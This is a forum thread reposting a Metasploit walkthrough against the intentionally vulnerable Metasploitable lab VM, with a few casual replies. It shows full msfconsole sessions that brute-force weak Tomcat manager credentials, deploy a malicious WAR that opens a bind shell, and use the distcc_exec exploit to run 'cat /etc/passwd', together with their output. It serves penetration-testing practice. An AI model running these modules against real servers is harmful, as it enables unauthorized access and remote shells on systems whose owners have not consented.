Metasploitable - Off-Topic

rx-

One of the questions that we often hear is "What systems can i use to test against?" Based on this, we thought it would be a good idea throw together an exploitable VM that you can use for testing purposes.

Metasploitable is an Ubuntu 8.04 server install on a VMWare 6.5 image. A number of vulnerable packages are included, including an install of tomcat 5.5 (with weak credentials), distcc, tikiwiki, twiki, and an older mysql.

More info here: http://adf.ly/2fYR ( Metasploit BLOG Post )


msf &gt; use scanner/http/tomcat_mgr_login
msf auxiliary(tomcat_mgr_login) &gt; set RHOSTS metasploitable
msf auxiliary(tomcat_mgr_login) &gt; set RPORT 8180
msf auxiliary(tomcat_mgr_login) &gt; exploit

&#46;&#46;&#46;
&#91;*&#93; 10&#46;0&#46;0&#46;33&#58;8180 - Trying username&#58;'tomcat' with password&#58;'role1'
&#91;-&#93; http&#58;//10&#46;0&#46;0&#46;33&#58;8180/manager/html &#91;Apache-Coyote/1&#46;1&#93; &#91;Tomcat Application Manager&#93; failed to login as 'tomcat'
&#91;*&#93; 10&#46;0&#46;0&#46;33&#58;8180 - Trying username&#58;'tomcat' with password&#58;'root'
&#91;-&#93; http&#58;//10&#46;0&#46;0&#46;33&#58;8180/manager/html &#91;Apache-Coyote/1&#46;1&#93; &#91;Tomcat Application Manager&#93; failed to login as 'tomcat'
&#91;*&#93; 10&#46;0&#46;0&#46;33&#58;8180 - Trying username&#58;'tomcat' with password&#58;'tomcat'
&#91;+&#93; http&#58;//10&#46;0&#46;0&#46;33&#58;8180/manager/html &#91;Apache-Coyote/1&#46;1&#93; &#91;Tomcat Application Manager&#93; successful login 'tomcat' &#58; 'tomcat'
&#91;*&#93; 10&#46;0&#46;0&#46;33&#58;8180 - Trying username&#58;'both' with password&#58;'admin'

Woot! That's a valid (tomcat&#58;tomcat) login&#46; - Now that we have valid credentials, let's try jduck's Tomcat Manager Application Deployer (tomcat_mgr_deploy) against it&#58;

msf &gt; use multi/http/tomcat_mgr_deploy
msf exploit(tomcat_mgr_deploy) &gt; set RHOST metasploitable
msf exploit(tomcat_mgr_deploy) &gt; set USERNAME tomcat
msf exploit(tomcat_mgr_deploy) &gt; set PASSWORD tomcat
msf exploit(tomcat_mgr_deploy) &gt; set RPORT 8180
msf exploit(tomcat_mgr_deploy) &gt; set PAYLOAD linux/x86/shell_bind_tcp
msf exploit(tomcat_mgr_deploy) &gt; exploit

&#91;*&#93; Started bind handler
&#91;*&#93; Attempting to automatically select a target&#46;&#46;&#46;
&#91;*&#93; Automatically selected target \"Linux X86\"
&#91;*&#93; Uploading 1612 bytes as HJpy1H&#46;war &#46;&#46;&#46;
&#91;*&#93; Executing /HJpy1H/EpKaNLsCQUUjo&#46;jsp&#46;&#46;&#46;
&#91;*&#93; Undeploying HJpy1H &#46;&#46;&#46;
&#91;*&#93; Sending stage (36 bytes) to metasploitable
&#91;*&#93; Command shell session 1 opened (10&#46;0&#46;0&#46;11&#58;39497 -&gt; 10&#46;0&#46;0&#46;33&#58;4444) at 2010-05-19 11&#58;53&#58;12 -0500


Sweet! And&#46;&#46;&#46; that's a shell, facilitated by a malcious &#46;WAR file&#46; The distcc_exec module is also a nice exploit to test with&#46; In this case, we'll use a command payload to 'cat /etc/passwd'&#58;

use unix/misc/distcc_exec
msf exploit(distcc_exec) &gt; set PAYLOAD cmd/unix/generic
msf exploit(distcc_exec) &gt; set RHOST metasploitable
msf exploit(distcc_exec) &gt; set CMD 'cat /etc/passwd'
msf exploit(distcc_exec) &gt; exploit
connecting&#46;&#46;&#46;

&#91;*&#93; stdout&#58; root&#58;x&#58;0&#58;0&#58;root&#58;/root&#58;/bin/bash
&#91;*&#93; stdout&#58; daemon&#58;x&#58;1&#58;1&#58;daemon&#58;/usr/sbin&#58;/bin/sh
&#46;&#46;&#46;

Xin

Hmm bit lost, so you made this?

x3n0n

I don't think so :P Correct me if I'm wrong ;)

rx-

Of course i didnt made it, thats why it is in discussion not releases. Read the link on the metasploit blog.

h4ckingURLife

Wow, that looks really interesting. I bookmarked their blog for later use when I'm bored. :)
Thanks for the share.

Howdy, Stranger!

Top Posters

Who's Online (2)